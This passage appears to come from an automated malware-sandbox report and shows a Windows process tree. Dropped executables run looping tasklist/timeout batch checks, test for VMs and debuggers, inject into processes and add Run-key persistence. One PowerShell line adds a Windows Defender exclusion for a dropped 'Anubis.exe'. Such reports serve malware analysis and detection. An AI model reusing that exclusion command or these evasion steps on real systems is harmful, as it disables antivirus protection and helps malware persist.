                                                                                                                          6⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:2672
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                                          6⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1056
                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                          find ":"
                                                                                                                          6⤵
                                                                                                                            PID:1276
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            Timeout /T 1 /Nobreak
                                                                                                                            6⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:2332
                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                            Tasklist /fi "PID eq 2300"
                                                                                                                            6⤵
                                                                                                                            • Enumerates processes with tasklist
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:916
                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                            find ":"
                                                                                                                            6⤵
                                                                                                                              PID:2920
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                              6⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:2704
                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                                              6⤵
                                                                                                                              • Enumerates processes with tasklist
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2344
                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                              find ":"
                                                                                                                              6⤵
                                                                                                                                PID:2080
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                                6⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:1700
                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                Tasklist /fi "PID eq 2300"
                                                                                                                                6⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2924
                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                find ":"
                                                                                                                                6⤵
                                                                                                                                  PID:2564
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                  6⤵
                                                                                                                                    PID:2904
                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                    Tasklist /fi "PID eq 2300"
                                                                                                                                    6⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2104
                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                    find ":"
                                                                                                                                    6⤵
                                                                                                                                      PID:832
                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                                      6⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:1720
                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                                      6⤵
                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:296
                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                      find ":"
                                                                                                                                      6⤵
                                                                                                                                        PID:1732
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                                        6⤵
                                                                                                                                          PID:2452
                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                                                          6⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1544
                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                          find ":"
                                                                                                                                          6⤵
                                                                                                                                            PID:3028
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            Timeout /T 1 /Nobreak
                                                                                                                                            6⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:2064
                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                            Tasklist /fi "PID eq 2300"
                                                                                                                                            6⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2968
                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                            find ":"
                                                                                                                                            6⤵
                                                                                                                                              PID:884
                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                              6⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:1576
                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                                                              6⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1236
                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                              find ":"
                                                                                                                                              6⤵
                                                                                                                                                PID:2788
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                                                6⤵
                                                                                                                                                  PID:1264
                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                                                  6⤵
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2400
                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                  find ":"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:940
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                    6⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:1584
                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                    Tasklist /fi "PID eq 2300"
                                                                                                                                                    6⤵
                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                    PID:1988
                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                    find ":"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2360
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                                                      6⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:2564
                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                                                      6⤵
                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                      PID:1288
                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                      find ":"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:692
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2636
                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                                                                          6⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          PID:3060
                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                          find ":"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:3056
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            Timeout /T 1 /Nobreak
                                                                                                                                                            6⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:3428
                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                            Tasklist /fi "PID eq 2300"
                                                                                                                                                            6⤵
                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                            PID:3860
                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                            find ":"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:3868
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:3916
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:3944
                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                find ":"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:3956
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4004
                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                  PID:4052
                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                  find ":"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4060
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:1852
                                                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                                                    Tasklist /fi "PID eq 2300"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                                    PID:3264
                                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                                    find ":"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:3280
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:3320
                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3348
                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                        find ":"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:3360
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:3424
                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                            Tasklist /fi "PID eq 2300"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                            PID:3060
                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                            find ":"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3392
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3416
                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                Tasklist /fi "PID eq 2300"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                PID:3828
                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                find ":"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:3900
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:3952
                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                  PID:3932
                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                  find ":"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3980
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4004
                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                      PID:4072
                                                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                                                      find ":"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4052
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:3048
                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                        Tasklist /fi "PID eq 2300"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                        PID:3312
                                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                                        find ":"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:3284
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:3356
                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:3200
                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                            find ":"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:3332
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:3616
                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                              PID:3868
                                                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                                                              find ":"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:3888
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:3952
                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                  PID:3964
                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                  find ":"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4000
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:2916
                                                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                                                        find ":"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:4084
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                          PID:4052
                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                          PID:2880
                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                          find ":"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:3372
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            Timeout /T 1 /Nobreak
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:3712
                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:3736
                                                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                                                find ":"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:3744
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:3168
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:3364
                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                  find ":"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:3356
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:940
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2032
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                              PID:1040
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1204
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:2092
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                              PID:2752
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:2576
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                PID:2608
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1016
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                  PID:1460
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 508
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:2868
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:2780
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2052
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                PID:2044
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 500
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:1716
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:1616
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:3056
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:1640
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2012
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2800
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:2880
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:3296
                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:3392
                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                        Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:3440
                                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                                          find ":"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:3448
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            Timeout /T 1 /Nobreak
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:3668
                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                            Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                            PID:3820
                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                            find ":"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:3828
                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                              PID:3904
                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                              Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                              PID:3924
                                                                                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                                                                                              find ":"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:3932
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:3992
                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:4020
                                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                  find ":"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:4028
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:4088
                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
